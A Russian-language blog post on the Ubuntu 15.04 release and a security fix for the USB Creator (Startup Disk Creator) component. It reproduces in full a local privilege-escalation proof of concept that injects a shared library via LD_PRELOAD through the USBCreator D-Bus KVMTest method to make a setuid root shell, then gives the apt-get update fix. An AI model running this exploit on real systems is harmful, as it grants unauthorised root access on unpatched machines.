Не успела выйти новая версия Ubuntu 15.04 (Vivid Vervet), как уже на подходе обновление безопасности. Canonical решили оставаться в тренде и брать от мира открытого ПО самые сливки. В этой версии они решили таки отказаться от своей системы инициализации upstart и перейти на темную сторону на systemd. Естественно, пилить свое и своими силами всегда более ресуроемко, нежели обратиться к мировому сообществу лицом, редхатовцы/федоровцы скорей всего дико возликовали от этой новости.
Не буду публиковать описание всех изменений, которые произошли в этой версии. Это можно прочитать на более крутых новостных ИТ-ресурсах 😉 Процитирую opennet.ru
Ключевым новшеством Ubuntu 15.04 является перевод дистрибутива на системный менеджер systemd, который заменил собой систему инициализации upstart в конфигурации по умолчанию. Опциональная возможность использования upstart оставлена (загрузку с upstart можно выбрать в меню “Advanced options for Ubuntu” в GRUB), более того компоненты upstart пока оставлены для управления пользовательскими сеансами. В рамках текущего цикла разработки решено не переводить на systemd Ubuntu Touch.
Источник: opennet.ru
Еще хочу обратить внимание на дистрибутив Ubuntu MATE. Решили отобрать кусок хлеба у дистрибутива Linux Mint 😉
Но перейдем к самое теме публикации – обновлении безопасности Ubuntu Linux 15.04.
Обновление коснулось компонента USB creator, который еще называется Startup Disk Creator. Разработчик Тэвис Орманди обратил внимание, что это приложение запускает программы от учетной записи администратора. Это чревато тем, что злоумышленник, имеющий физический доступ к системе может получить административные привилегии. Эта проблема так же выявлена в следующих версиях дистрибутивах: Ubuntu 14.10, Ubuntu 14.04 LTS, и Ubuntu 12.04 LTS. Это заявление приняло статус официального заявления проблемы с безопасностью и обновление системы вышло так быстро, как это было возможным.
Пример работы этой уязвимости от Тэвиса:
$ cat > test.c void __attribute__((constructor)) init (void) { chown("/tmp/test", 0, 0); chmod("/tmp/test", 04755); } $ gcc -shared -fPIC -o /tmp/test.so test.c $ cp /bin/sh /tmp/test $ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so" method return sender=:1.4364 -> dest=:1.7427 reply_serial=2 $ ls -l /tmp/test -rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test $ /tmp/test # id euid=0(root) groups=0(root)
Для устранения этой проблемы следует обновить пакет usb-creator-common до последней версии. Для обновления следует выполнить две команды в терминале
sudo apt-get update sudo apt-get dist-upgrade
Либо произвести обновление из оконного интерфейса с помощью менеджера обновлений. После окончания процедуры обновления перезагрузка сервера не потребуется.